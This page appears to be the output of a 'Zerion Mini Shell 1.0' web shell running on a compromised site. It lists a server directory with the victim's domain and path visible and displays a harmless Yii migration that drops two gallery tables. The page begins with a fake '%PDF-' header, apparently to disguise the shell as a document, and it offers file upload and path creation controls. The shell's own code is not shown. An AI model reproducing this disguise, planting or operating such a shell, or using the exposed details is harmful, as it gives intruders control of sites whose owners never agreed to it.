%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/vacivi36/intranet.vacivitta.com.br/protected/modules/gallery/migrations/
Upload File :
Create Path :
Current File : /home/vacivi36/intranet.vacivitta.com.br/protected/modules/gallery/migrations/uninstall.php

<?php

use \yii\db\Migration;

class uninstall extends Migration
{

    public function up()
    {
        $this->dropTable('gallery_media');
        $this->dropTable('gallery_gallery');
    }

    public function down()
    {
        echo "uninstall does not support migration down.\n";
        return false;
    }

}

Zerion Mini Shell 1.0